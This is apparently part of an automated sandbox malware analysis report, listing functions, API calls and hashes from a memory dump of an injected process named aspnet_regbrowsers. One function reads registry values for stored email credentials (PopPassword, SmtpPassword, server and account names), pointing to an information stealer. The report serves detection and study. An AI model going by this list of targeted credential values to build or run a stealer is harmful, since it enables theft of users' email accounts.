                                                                                              • Snapshot File: hcaresult_26_2_400000_aspnet_regbrowsers.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: Close
                                                                                              • String ID:
                                                                                              • API String ID: 3535843008-0
                                                                                              • Opcode ID: a61027cf4d9072e61279d4b4f16a9571f3d05446971c54f2b184413104fd85b7
                                                                                              • Instruction ID: 75bcc15c4d71fff8019d16f1d9debb39272117f3de5fdcc107556e34aff8dcac
                                                                                              • Opcode Fuzzy Hash: a61027cf4d9072e61279d4b4f16a9571f3d05446971c54f2b184413104fd85b7
                                                                                              • Instruction Fuzzy Hash: 7CC092312843087AEA102AE2EC0BF093E0D9B41F98F500025B61C3C1D2E9E3E6100099
                                                                                              APIs
                                                                                              • PathFileExistsW.SHLWAPI(?,00000002,DC0853E1,00000000,00000000), ref: 00403B7A
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.665835166.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_400000_aspnet_regbrowsers.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: ExistsFilePath
                                                                                              • String ID:
                                                                                              • API String ID: 1174141254-0
                                                                                              • Opcode ID: 79b415000e3dec3248a6d2155c6771fe406342b29d1d2faf8e1af97ba013cdd8
                                                                                              • Instruction ID: 8bd75bc93bbce64143a6918826fd0663652f5dbe7ab318808702af7ec0dd126f
                                                                                              • Opcode Fuzzy Hash: 79b415000e3dec3248a6d2155c6771fe406342b29d1d2faf8e1af97ba013cdd8
                                                                                              • Instruction Fuzzy Hash: F4C0923028830C3BF9113AD2DC47F197E8D8B41B99F104025B70C3C4D2D9E3A6100199
                                                                                              APIs
                                                                                              • recv.WS2_32(00000000,00000000,00000FD0,00000000), ref: 00404EE2
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.665835166.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_400000_aspnet_regbrowsers.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: recv
                                                                                              • String ID:
                                                                                              • API String ID: 1507349165-0
                                                                                              • Opcode ID: 21ce8f986ded34978476a8ad781d548340edbce2afa6bcd3c515a11396da2d1b
                                                                                              • Instruction ID: cd18cecc4e97c8ae47002f9e4185d290addc31a5a75b3629954b28b764c5713b
                                                                                              • Opcode Fuzzy Hash: 21ce8f986ded34978476a8ad781d548340edbce2afa6bcd3c515a11396da2d1b
                                                                                              • Instruction Fuzzy Hash: 6EC0483204020CFBCF025F81EC05BD93F2AFB48760F448020FA1818061C772A520AB88
                                                                                              APIs
                                                                                              • closesocket.WS2_32(00404EB0), ref: 00404DEB
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.665835166.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_400000_aspnet_regbrowsers.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: closesocket
                                                                                              • String ID:
                                                                                              • API String ID: 2781271927-0
                                                                                              • Opcode ID: 887654383893d56b64fc04469bc98b787ac4c367861e76a9ad562a01a17cc3aa
                                                                                              • Instruction ID: a7719220e23c04317d26723f710bfa070304820e6d91f105ed764937a1a9d613
                                                                                              • Opcode Fuzzy Hash: 887654383893d56b64fc04469bc98b787ac4c367861e76a9ad562a01a17cc3aa
                                                                                              • Instruction Fuzzy Hash: F4A0113000020CEBCB002B82EE088C83F2CEA882A0B808020F80C00020CB22A8208AC8
                                                                                              APIs
                                                                                                • Part of subcall function 00402B7C: GetProcessHeap.KERNEL32(00000000,?,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E), ref: 00402B85
                                                                                                • Part of subcall function 00402B7C: RtlAllocateHeap.NTDLL(00000000,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E,00000000), ref: 00402B8C
                                                                                                • Part of subcall function 004044A7: GetPrivateProfileStringW.KERNEL32(?,?,?,?,?,?,00000000,F66BE5A2,00000000,00000000), ref: 004044CB
                                                                                              • GetLastError.KERNEL32 ref: 00404585
                                                                                                • Part of subcall function 00402BAB: GetProcessHeap.KERNEL32(00000000,00000000), ref: 00402BB9
                                                                                                • Part of subcall function 00402BAB: HeapFree.KERNEL32(00000000), ref: 00402BC0
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.665835166.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_400000_aspnet_regbrowsers.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: Heap$Process$AllocateErrorFreeLastPrivateProfileString
                                                                                              • String ID:
                                                                                              • API String ID: 4065557613-0
                                                                                              • Opcode ID: 07df6e299c1e51546a6fce8a11171accc3f3248d34e9f20b559e9614b6af16c3
                                                                                              • Instruction ID: 4921b4961515552709d35feb502e82dc384c9b3b90426e204c6f6ec5e0b55acd
                                                                                              • Opcode Fuzzy Hash: 07df6e299c1e51546a6fce8a11171accc3f3248d34e9f20b559e9614b6af16c3
                                                                                              • Instruction Fuzzy Hash: 901157B26011043BEB249EA9AD46F7FB768DF84368F10413FFB05E61D0EA789C00069C
                                                                                              APIs
                                                                                              • VirtualFree.KERNELBASE(0041028C,00000000,00008000,00000000,F53ECACB,00000000,00000000,00000000,?,0041028C,00000000), ref: 00403FBA
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.665835166.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_400000_aspnet_regbrowsers.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: FreeVirtual
                                                                                              • String ID:
                                                                                              • API String ID: 1263568516-0
                                                                                              • Opcode ID: 4437192c676a59da206b473fb72d9d26ef1781d862ceba0a26f5730449a5d479
                                                                                              • Instruction ID: 31a36aa897feec3f2575a3818ba469950b8b51fe97d839facc05156de448dee4
                                                                                              • Opcode Fuzzy Hash: 4437192c676a59da206b473fb72d9d26ef1781d862ceba0a26f5730449a5d479
                                                                                              • Instruction Fuzzy Hash: 9CC08C3200613C32893069DBAC0AFCB7E0CDF036F4B104021F50C6404049235A0186F8
                                                                                              APIs
                                                                                              • CloseHandle.KERNELBASE(00000000,00000000,FBCE7A42,00000000,00000000,?,00404344,00000000,?,?,004146E2,00000000,00000000,?,00000000,00000000), ref: 00403C55
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.665835166.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_400000_aspnet_regbrowsers.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: CloseHandle
                                                                                              • String ID:
                                                                                              • API String ID: 2962429428-0
                                                                                              • Opcode ID: 67fd61e36e72385b159b193fd7e1560e83aa445b7d913ea69a34d34039b65f78
                                                                                              • Instruction ID: f60e35b61e15034c3e7e350ceef27d37971f1a6745175d5827dd76012fe363c0
                                                                                              • Opcode Fuzzy Hash: 67fd61e36e72385b159b193fd7e1560e83aa445b7d913ea69a34d34039b65f78
                                                                                              • Instruction Fuzzy Hash: 70B092B01182087EAE006AF29C05C3B3E4ECA4060874094267C08E5451F937DF2014B4
                                                                                              APIs
                                                                                              • Sleep.KERNELBASE(?,00000000,CFA329AD,00000000,00000000), ref: 00406487
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.665835166.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_400000_aspnet_regbrowsers.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: Sleep
                                                                                              • String ID:
                                                                                              • API String ID: 3472027048-0
                                                                                              • Opcode ID: 1807eaeb392d941871dd7f4dce37bd4a7f558bd6a955fa7349a6f4d515d7796f
                                                                                              • Instruction ID: 8d08050a97d9600d7c0dbf2a5018eca7d85037e123ae0040efa9f3f0a7dd9c36
                                                                                              • Opcode Fuzzy Hash: 1807eaeb392d941871dd7f4dce37bd4a7f558bd6a955fa7349a6f4d515d7796f
                                                                                              • Instruction Fuzzy Hash: FBB092B08082083EEA002AF1AD05C3B7A8DDA4020870088257C08E5011E93ADE1150B9
                                                                                              APIs
                                                                                              • CoInitialize.OLE32(00000000), ref: 0040438F
                                                                                              • CoCreateInstance.OLE32(00418EC0,00000000,00000001,00418EB0,?), ref: 004043A9
                                                                                              • VariantInit.OLEAUT32(?), ref: 004043C4
                                                                                              • SysAllocString.OLEAUT32(?), ref: 004043CD
                                                                                              • VariantInit.OLEAUT32(?), ref: 00404414
                                                                                              • SysAllocString.OLEAUT32(?), ref: 00404419
                                                                                              • VariantInit.OLEAUT32(?), ref: 00404431
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.665835166.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_400000_aspnet_regbrowsers.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: InitVariant$AllocString$CreateInitializeInstance
                                                                                              • String ID:
                                                                                              • API String ID: 1312198159-0
                                                                                              • Opcode ID: 36af1e644ba25a92da10ffd92c092694d7a96ee7919212810e1bb10a92bc3d30
                                                                                              • Instruction ID: 6cc2ba4480fbb4d68866773ab5e076051400aafb7d2546f6199fc19a864342a4
                                                                                              • Opcode Fuzzy Hash: 36af1e644ba25a92da10ffd92c092694d7a96ee7919212810e1bb10a92bc3d30
                                                                                              • Instruction Fuzzy Hash: 9A414C71A00609EFDB00EFE4DC84ADEBF79FF89314F10406AFA05AB190DB759A458B94
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.665835166.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_400000_aspnet_regbrowsers.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: QueryValue
                                                                                              • String ID: EmailAddress$PopAccount$PopPassword$PopPort$PopServer$SmtpAccount$SmtpPassword$SmtpPort$SmtpServer$Technology
                                                                                              • API String ID: 3660427363-2111798378
                                                                                              • Opcode ID: b68ba21e4a3a0049e44e4174c680ab59653fe0191a5276204f50c9857b9783d9
                                                                                              • Instruction ID: 091e628055053f5eef329adcdd4db079f25726ad560f051e033024c376855220
                                                                                              • Opcode Fuzzy Hash: b68ba21e4a3a0049e44e4174c680ab59653fe0191a5276204f50c9857b9783d9
                                                                                              • Instruction Fuzzy Hash: AE414EB5941218BADF127BE6DD42F9E7F76EF94304F21003AF600721B2C77A99609B48
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.666825665.0000000001272000.00000020.00000001.01000000.0000000B.sdmp, Offset: 01270000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.666816077.0000000001270000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.666881308.000000000127A000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_1270000_aspnet_regbrowsers.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 8756d1f4d055c0dc7aff075095dcbe292104c088d0133e29438e6fa3ee789895
                                                                                              • Instruction ID: ea083b8401bd2fe80e0752b9ddca46f36897a54899967f98843c23b55d307a01
                                                                                              • Opcode Fuzzy Hash: 8756d1f4d055c0dc7aff075095dcbe292104c088d0133e29438e6fa3ee789895
                                                                                              • Instruction Fuzzy Hash: A362482108EBC14FC3078B709D756927FB5AE4322475E9ACBC4C1CF1A3D61A995AE372
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.665835166.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_400000_aspnet_regbrowsers.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: db4539c410e0fe4373e7c5db18565f275e95a05af4a94000d4ba81a11fef15ca
                                                                                              • Instruction ID: 891bc98f6eee734ec0083ebf38281cede3cc23ab6c94fa2f23d2f5c2768c820d
                                                                                              • Opcode Fuzzy Hash: db4539c410e0fe4373e7c5db18565f275e95a05af4a94000d4ba81a11fef15ca
                                                                                              • Instruction Fuzzy Hash: D141F1B0614B205EE30C8F19C895676BFE2EF82341748C07EE8AE8F695C635D506EF58
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.665835166.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_400000_aspnet_regbrowsers.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 5f39fa327c75608c0a161e98e355e11108031192147f1793d7a103cb0e814a40
                                                                                              • Instruction ID: 8dc71014d8856f8ef2ad0e1c9cf09a1ab0c18a5277cabcb9e4e86e23f7506178
                                                                                              • Opcode Fuzzy Hash: 5f39fa327c75608c0a161e98e355e11108031192147f1793d7a103cb0e814a40
                                                                                              • Instruction Fuzzy Hash: 4B21BE76AB0A9317DB618D38C8C83B263D0EF99700F980634CF40D37C6D678EA21DA84
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.665835166.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_400000_aspnet_regbrowsers.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 5b57611fa40680ed248d57f37b4973e9bad199baf80beacdc2a2503593addd55
                                                                                              • Instruction ID: 125f84157e295c2adc52e6f8c9cb261871d96e12da6c9e12f7e31892ee598d11
                                                                                              • Opcode Fuzzy Hash: 5b57611fa40680ed248d57f37b4973e9bad199baf80beacdc2a2503593addd55
                                                                                              • Instruction Fuzzy Hash: 0B01A272A10204ABDB21DF59C885E6FF7FCEB49761F10417FF804A7381D639AE008A64